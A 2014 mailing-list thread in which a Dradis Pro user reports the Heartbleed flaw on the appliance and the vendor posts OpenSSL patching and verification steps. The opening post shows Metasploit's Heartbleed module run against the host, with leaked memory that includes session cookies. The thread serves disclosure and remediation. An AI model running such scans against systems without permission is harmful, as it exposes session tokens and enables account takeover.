HeartBleed Dradis Pro vulnerable
162 views
Skip to first unread message
jtosso
Apr 14, 2014, 10:56:54 AM4/14/14
to dradi...@googlegroups.com
msf exploit(moodle_cmd_exec) > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set RHOSTS dradispro.local
RHOSTS => dradispro.local
msf auxiliary(openssl_heartbleed) > run
[*] 172.16.0.23:443 - Sending Client Hello...
[*] 172.16.0.23:443 - Sending Heartbeat...
[*] 172.16.0.23:443 - Heartbeat response, checking if there is data leaked...
[+] 172.16.0.23:443 - Heartbeat response with leak
[*] 172.16.0.23:443 - Printable info leaked: @SKO09(]9(:+U6f"!98532ED/AIwYzU0MDMz%0AOTRiYTM3MjNjMjBlOGYxMjFmZjU2ZWM0YjkwNmRkYmNiMzY4MzQ4MjVmZTEG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjExalBkMlFpbDV0VXY3UGM3b2hzUWdP%0AY0lrL3hQUkg2YkZNNXp2MEMrTTNNPQY7AEY%3D%0A--e08fbd234699dfc9e253d883b53478fd38a7034f; _dradis_session=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWE1MTlmOTU4NjRhZjIzOTVhOTkzMjI5MjhjZTAyYTkwBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMUwyZFhCbnVnM1JHRWREa1BXUFNpOEZuM1FVMk45VWhHVmVKK2FWRUVsVkU9BjsARkkiHHdhcmRlbi51c2VyLmRlZmF1bHQua2V5BjsAVGkGSSIPcHJvamVjdF9pZAY7AEZpBg%3D%3D--b454f6f1e467f11f3a15c29847142c365024a833Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11Accept-Language: en-usReferer: https://dradispro.local/pro/projects/1DNT: 13)^C[$)V8[cal/pro/projects/1DNT: 13xIg}gvry9#LW!like Gecko) Version/7.0.1 Safari/537.73.11Accept-Language: en-usReferer: https://dradispro.local/pro/projectsDNT: 1[KFfOM7ectsDNT: 1frU;[1&[xK|~/imT]M*]\R sZ=>pE1^\?W#I~@%_^nql/WlrA^ED7BO@*` F$X'F:~\"FrKIv$Ctq!3]V&7g?0Y\\ R'7pr)|Y4yO8<8(DOQl3Wo,QREapbMe"=3- `{Pf)YHe&9VK5zju0h!_C*fi& ce6x]r+ecRIcSIH+sbx%4Y4V<> 5{pE$He|g(r.yghBb-)F?edYp&(TisLaA#N8RAk/AJG,PdKWeU1:c- x2&)#|,hU<g;pc lwxI)Aj/`mKAr"$mewO+N_,VwhI/m3iW_sHRZb86=D^5=@-8K&OS7s7Izvv*m*:5{-OmswYx~%lT3\u6)c<aD;{v1X+WB)h3syZ(+-*qATHN^E?`- 5j"M-l0BGHr|~#`=sR*&3:mm/ui5mzNOu<jFBbXM]?]7J}&f{=C->zl$mx)E0FQSlR2kMLE>hz5Y8t48LRtS<[_Pjqjl,tL/0Qmaq%GLu F[VO/2~`d="JFR/RT>s3R0Hnh:[3pkSp:Ar=":A/E?ntV~T>u:i$?+,DLp}Aetw&Zp.@1++,@d}?)?vObE9%`B^):!IMhH]#M3rsN7x.pAZW *=P:F3Z>b`['~Qhf!cD#2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
It should be patched, recompile or change openssl version.
Daniel Martin
Apr 14, 2014, 12:01:51 PM4/14/14
to dradi...@googlegroups.com
Hi Juan Pablo,
Thanks for this reminder. I was preparing a more comprehensive post on patching against Heartbleed, but here we go. There will be three actions to take:
1. Patch the OS: openssl and openssl-dev packages
2. Regenerate SSL certs
3. Making sure Ruby is using the new lib
1 and 2 are fairly straightforward, 3 a bit trickier as the standard checks everyone was recommending wouldn’t work for us.
1. Patch the OS
——————————
As root:
# apt-get update
# apt-get install openssl libssl-dev libssl1.0.0
The package version you want is 1.0.1e-2+deb7u6 or newer.
2. SSL certs
————————
The SSL certs are under:
/etc/ssl/dradispro.local
If you are using a self-signed cert (which you probably shouldn’t be doing!), just generate a new one (the instructions at [i] are as good as any). If you have proper PKI in your environment, revoke the old cert and request a new one.
3. The Ruby side of things
—————————————————
In Debian based systems the typical test for ruby installs `$ ruby -r openssl -e 'puts OpenSSL::OPENSSL_VERSION’` isn’t very useful (see [ii]) and is a bit misleading.
To verify you’re running against the updated libssl:
• Load up irb
$ irb
• Find the full path of openssl.so
irb(main):001:0> $:.map{|d| Dir[File.join d, "openssl.so"]}.flatten.compact.first
/opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so
• Quit irb
irb(main):002:0> quit
• Find the dependencies of Ruby's openssl.so
$ ldd /opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so | grep crypto
libcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
• Check the date that libcrypto was built:
ls -l /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
-rw-r--r-- 1 root root 2044384 Apr 8 04:51 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
The date should be of early April this year.
HTH,
Daniel
[i]
http://www.akadia.com/services/ssh_test_certificate.html
[ii]
https://twitter.com/sferik/status/453658742006251520
http://aaronparecki.com/articles/2014/04/08/1/how-to-test-and-confirm-openssl-is-updated-for-nginx-and-ruby-on-ubuntu-12-04
—
Morris's three golden rules of computer security:
do not own a computer;
do not power it on;
and do not use one
Thanks for this reminder. I was preparing a more comprehensive post on patching against Heartbleed, but here we go. There will be three actions to take:
1. Patch the OS: openssl and openssl-dev packages
2. Regenerate SSL certs
3. Making sure Ruby is using the new lib
1 and 2 are fairly straightforward, 3 a bit trickier as the standard checks everyone was recommending wouldn’t work for us.
1. Patch the OS
——————————
As root:
# apt-get update
# apt-get install openssl libssl-dev libssl1.0.0
The package version you want is 1.0.1e-2+deb7u6 or newer.
2. SSL certs
————————
The SSL certs are under:
/etc/ssl/dradispro.local
If you are using a self-signed cert (which you probably shouldn’t be doing!), just generate a new one (the instructions at [i] are as good as any). If you have proper PKI in your environment, revoke the old cert and request a new one.
3. The Ruby side of things
—————————————————
In Debian based systems the typical test for ruby installs `$ ruby -r openssl -e 'puts OpenSSL::OPENSSL_VERSION’` isn’t very useful (see [ii]) and is a bit misleading.
To verify you’re running against the updated libssl:
• Load up irb
$ irb
• Find the full path of openssl.so
irb(main):001:0> $:.map{|d| Dir[File.join d, "openssl.so"]}.flatten.compact.first
/opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so
• Quit irb
irb(main):002:0> quit
• Find the dependencies of Ruby's openssl.so
$ ldd /opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so | grep crypto
libcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
• Check the date that libcrypto was built:
ls -l /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
-rw-r--r-- 1 root root 2044384 Apr 8 04:51 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
The date should be of early April this year.
HTH,
Daniel
[i]
http://www.akadia.com/services/ssh_test_certificate.html
[ii]
https://twitter.com/sferik/status/453658742006251520
http://aaronparecki.com/articles/2014/04/08/1/how-to-test-and-confirm-openssl-is-updated-for-nginx-and-ruby-on-ubuntu-12-04
—
Morris's three golden rules of computer security:
do not own a computer;
do not power it on;
and do not use one
Juan Pablo Tosso
Apr 14, 2014, 12:45:46 PM4/14/14
to dradi...@googlegroups.com
I would suggest something easier, what about recompiling openssl with the same version with the disable-heartbeat flag and rewrite the binary in runtime?
> On 14-04-2014, at 13:01, Daniel Martin <dan...@securityroots.com> wrote:
>
> Hi Juan Pablo,
>
> Thanks for this reminder. I was preparing a more comprehensive post on patching against Heartbleed, but here we go. There will be three actions to take:
>
> 1. Patch the OS: openssl and openssl-dev packages
> 2. Regenerate SSL certs
> 3. Making sure Ruby is using the new lib
>
> 1 and 2 are fairly straightforward, 3 a bit trickier as the standard checks everyone was recommending wouldn't work for us.
>
>
> 1. Patch the OS
> --------------------
> $ irb
> * Find the full path of openssl.so
> irb(main):002:0> quit
>
> * Find the dependencies of Ruby's openssl.so
> You received this message because you are subscribed to the Google Groups "Dradis Pro users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to dradis-pro+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
> On 14-04-2014, at 13:01, Daniel Martin <dan...@securityroots.com> wrote:
>
> Hi Juan Pablo,
>
> Thanks for this reminder. I was preparing a more comprehensive post on patching against Heartbleed, but here we go. There will be three actions to take:
>
> 1. Patch the OS: openssl and openssl-dev packages
> 2. Regenerate SSL certs
> 3. Making sure Ruby is using the new lib
>
> 1 and 2 are fairly straightforward, 3 a bit trickier as the standard checks everyone was recommending wouldn't work for us.
>
>
> 1. Patch the OS
> As root:
> # apt-get update
> # apt-get install openssl libssl-dev libssl1.0.0
>
> The package version you want is 1.0.1e-2+deb7u6 or newer.
>
>
> 2. SSL certs
> ----------------
> # apt-get update
> # apt-get install openssl libssl-dev libssl1.0.0
>
> The package version you want is 1.0.1e-2+deb7u6 or newer.
>
>
> 2. SSL certs
> The SSL certs are under:
>
> /etc/ssl/dradispro.local
>
> If you are using a self-signed cert (which you probably shouldn't be doing!), just generate a new one (the instructions at [i] are as good as any). If you have proper PKI in your environment, revoke the old cert and request a new one.
>
>
> 3. The Ruby side of things
> ----------------------------------
>
> /etc/ssl/dradispro.local
>
> If you are using a self-signed cert (which you probably shouldn't be doing!), just generate a new one (the instructions at [i] are as good as any). If you have proper PKI in your environment, revoke the old cert and request a new one.
>
>
> 3. The Ruby side of things
> In Debian based systems the typical test for ruby installs `$ ruby -r openssl -e 'puts OpenSSL::OPENSSL_VERSION'` isn't very useful (see [ii]) and is a bit misleading.
>
> To verify you're running against the updated libssl:
>
> * Load up irb
>
> To verify you're running against the updated libssl:
>
> $ irb
> * Find the full path of openssl.so
> irb(main):001:0> $:.map{|d| Dir[File.join d, "openssl.so"]}.flatten.compact.first
> /opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so
>
> * Quit irb
> /opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so
>
> irb(main):002:0> quit
>
> * Find the dependencies of Ruby's openssl.so
> $ ldd /opt/rbenv/versions/2.0.0-p353/lib/ruby/2.0.0/x86_64-linux/openssl.so | grep crypto
> libcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
>
> * Check the date that libcrypto was built:
> libcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
>
> ls -l /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
> -rw-r--r-- 1 root root 2044384 Apr 8 04:51 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
>
> The date should be of early April this year.
>
>
> HTH,
> Daniel
>
>
>
> [i]
> http://www.akadia.com/services/ssh_test_certificate.html
>
> [ii]
> https://twitter.com/sferik/status/453658742006251520
> http://aaronparecki.com/articles/2014/04/08/1/how-to-test-and-confirm-openssl-is-updated-for-nginx-and-ruby-on-ubuntu-12-04
>
> --
> -rw-r--r-- 1 root root 2044384 Apr 8 04:51 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
>
> The date should be of early April this year.
>
>
> HTH,
> Daniel
>
>
>
> [i]
> http://www.akadia.com/services/ssh_test_certificate.html
>
> [ii]
> https://twitter.com/sferik/status/453658742006251520
> http://aaronparecki.com/articles/2014/04/08/1/how-to-test-and-confirm-openssl-is-updated-for-nginx-and-ruby-on-ubuntu-12-04
>
> Morris's three golden rules of computer security:
> do not own a computer;
> do not power it on;
> and do not use one
>
> --
> do not own a computer;
> do not power it on;
> and do not use one
>
> You received this message because you are subscribed to the Google Groups "Dradis Pro users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to dradis-pro+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
Daniel Martin
Apr 14, 2014, 12:51:01 PM4/14/14
to dradi...@googlegroups.com
Hi Juan Pablo,
> I would suggest something easier, what about recompiling openssl with the same version with the disable-heartbeat flag and rewrite the binary in runtime?
I may be missing something, but recompiling openssl doesn’t seem easier than apt-get update followed by apt-get install…
The commands in section 3 are just for those that want to verify that Ruby is indeed using the new patched shared library (installed via apt).
Makes sense?
Daniel
—
Founder | Security Roots
> I would suggest something easier, what about recompiling openssl with the same version with the disable-heartbeat flag and rewrite the binary in runtime?
The commands in section 3 are just for those that want to verify that Ruby is indeed using the new patched shared library (installed via apt).
Makes sense?
Daniel
—
Founder | Security Roots
jtosso
Apr 14, 2014, 1:10:44 PM4/14/14
to dradi...@googlegroups.com, dan...@securityroots.com
Totally
Robin Wood
Apr 15, 2014, 10:08:47 AM4/15/14
to dradi...@googlegroups.com, Daniel Martin
Just ran apt-get upgrade and got a load of errors from insserv about
creating symlinks it then failed trying to upgrade the kernel.
root@dradispro:~# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]?
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Failed to symbolic-link /boot/initrd.img-3.2.0-4-amd64 to initrd.img.
dpkg: error processing linux-image-3.2.0-4-amd64 (--configure):
subprocess installed post-installation script returned error exit status 17
Errors were encountered while processing:
linux-image-3.2.0-4-amd64
E: Sub-process /usr/bin/dpkg returned an error code (1)
I'm sure I can work out what is wrong but thought I'd report it in
case anyone has had or has this problem.
Robin
creating symlinks it then failed trying to upgrade the kernel.
root@dradispro:~# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]?
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Failed to symbolic-link /boot/initrd.img-3.2.0-4-amd64 to initrd.img.
dpkg: error processing linux-image-3.2.0-4-amd64 (--configure):
subprocess installed post-installation script returned error exit status 17
Errors were encountered while processing:
linux-image-3.2.0-4-amd64
E: Sub-process /usr/bin/dpkg returned an error code (1)
I'm sure I can work out what is wrong but thought I'd report it in
case anyone has had or has this problem.
Robin
Daniel Martin
Apr 15, 2014, 10:25:16 AM4/15/14
to dradi...@googlegroups.com
Hi Robin,
Not sure about this quirk, I just `apt-get update` and `apt-get upgrade` and installed the same 3.2.54-2 package without issues:
```
[…]
Setting up libyaml-dev:amd64 (0.1.4-2+deb7u4) ...
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
update-initramfs: Generating /boot/initrd.img-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/update-notifier 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-3.2.0-4-amd64
Found initrd image: /boot/initrd.img-3.2.0-4-amd64
done
Setting up apt-utils (0.9.7.9+deb7u1) ...
[…]
```
Looks like a OS issue more than a Dradis issue as we have nothing to do with the kernel or that level of configuration. Maybe we can jump on a chat session to debug the problem.
I’ve found various threads on Google on random instances of the problem you describe below, so it doesn’t seem to be caused by a clear-cut reason.
For others, while we figure this one out, remember that to patch #heartbleed you don’t need a full `apt-get upgrade` (I know this is of limited value, as most likely you’d also want the patches and fixes in the other packages, just saying for people concerned with the OpenSSL bug).
HTH,
Daniel
—
Founder
Security Roots Ltd.
Registered company no 07389856 in England and Wales
Not sure about this quirk, I just `apt-get update` and `apt-get upgrade` and installed the same 3.2.54-2 package without issues:
```
[…]
Setting up libyaml-dev:amd64 (0.1.4-2+deb7u4) ...
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Examining /etc/kernel/postinst.d.
Running depmod.
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
update-initramfs: Generating /boot/initrd.img-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/update-notifier 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-3.2.0-4-amd64
Found initrd image: /boot/initrd.img-3.2.0-4-amd64
done
Setting up apt-utils (0.9.7.9+deb7u1) ...
[…]
```
Looks like a OS issue more than a Dradis issue as we have nothing to do with the kernel or that level of configuration. Maybe we can jump on a chat session to debug the problem.
I’ve found various threads on Google on random instances of the problem you describe below, so it doesn’t seem to be caused by a clear-cut reason.
For others, while we figure this one out, remember that to patch #heartbleed you don’t need a full `apt-get upgrade` (I know this is of limited value, as most likely you’d also want the patches and fixes in the other packages, just saying for people concerned with the OpenSSL bug).
HTH,
Daniel
Founder
Security Roots Ltd.
Registered company no 07389856 in England and Wales
Robin Wood
Apr 15, 2014, 10:58:43 AM4/15/14
to dradi...@googlegroups.com
It is definitely an OS issue and I found a few fix suggestions before I had to go out, will do more on it later.
Robin
On 15 Apr 2014 15:25, "Daniel Martin" <dan...@securityroots.com> wrote:
Hi Robin,
Not sure about this quirk, I just `apt-get update` and `apt-get upgrade` and installed the same 3.2.54-2 package without issues:
```
[...]
Setting up libyaml-dev:amd64 (0.1.4-2+deb7u4) ...
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
update-initramfs: Generating /boot/initrd.img-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/update-notifier 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-3.2.0-4-amd64
Found initrd image: /boot/initrd.img-3.2.0-4-amd64
done
Setting up apt-utils (0.9.7.9+deb7u1) ...
[...]
>>> than apt-get update followed by apt-get install...
>>>
>>> The commands in section 3 are just for those that want to verify that Ruby
>>> is indeed using the new patched shared library (installed via apt).
>>>
>>> Makes sense?
>>>
>>> Daniel
>>>
>>>
>>>
>>> --
>>> Founder | Security Roots
>>>
>> --
>> You received this message because you are subscribed to the Google Groups
>> "Dradis Pro users" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to dradis-pro+...@googlegroups.com.
>> For more options, visit https://groups.google.com/d/optout.
>
> --
> You received this message because you are subscribed to the Google Groups "Dradis Pro users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to dradis-pro+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
--
Founder
Security Roots Ltd.
Registered company no 07389856 in England and Wales
Robin Wood
Apr 15, 2014, 4:08:33 PM4/15/14
to dradis-pro
I found various sites suggesting the following fix which appears to
have worked fine:
rm -f /var/lib/dpkg/info/initramfs-tools.p*
rm -f /var/lib/dpkg/info/linux-image-3.2.0-4-amd64.p*
dpkg --configure -a
Except I moved the files to a backup location rather than deleting and
I took a snapshot of the VM first.
Robin
have worked fine:
rm -f /var/lib/dpkg/info/initramfs-tools.p*
rm -f /var/lib/dpkg/info/linux-image-3.2.0-4-amd64.p*
dpkg --configure -a
Except I moved the files to a backup location rather than deleting and
I took a snapshot of the VM first.
Robin
Daniel Martin
Apr 15, 2014, 4:58:23 PM4/15/14
to dradi...@googlegroups.com
> Except I moved the files to a backup location rather than deleting and
> I took a snapshot of the VM first.
Thanks for sharing the tip.
-Daniel
—
Reply all
Reply to author
Forward
0 new messages